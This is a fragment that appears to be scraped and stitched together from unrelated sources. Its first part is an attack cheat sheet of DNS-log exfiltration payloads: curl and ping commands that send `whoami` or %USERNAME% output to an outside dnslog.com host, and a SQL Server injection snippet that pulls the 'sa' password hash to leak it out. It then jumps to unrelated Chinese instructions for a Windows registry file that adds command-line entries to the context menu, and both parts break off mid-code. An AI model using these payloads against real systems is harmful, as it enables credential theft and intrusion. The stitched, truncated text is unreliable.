0x00 Command Execution
i. *nix:
curl http://ip.port.b182oj.dnslog.com/`whoami`
ping `whoami`.ip.port.b182oj.dnslog.com
ii. windows
ping %USERNAME%.b182oj.dnslog.com
0x01 SQL Injection
i. SQL Server
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'....
代码如下,Windows直接新建txt,粘贴进去保存,然后选择另存为,保存类型选所有文件、编码选ANSI、文件名为CmdAndPowershellAll.reg(名字无所谓,后缀为.reg就可以)。双击打开,会进行两次确认,然后会提示“已成功添加到注册表中”,这样就成功了!现在可以右键、shift+右键尝试一下了!
Windows Registry Editor Version 5.00
; 1.右键:命令行
[HKEY_CLASSES_RO...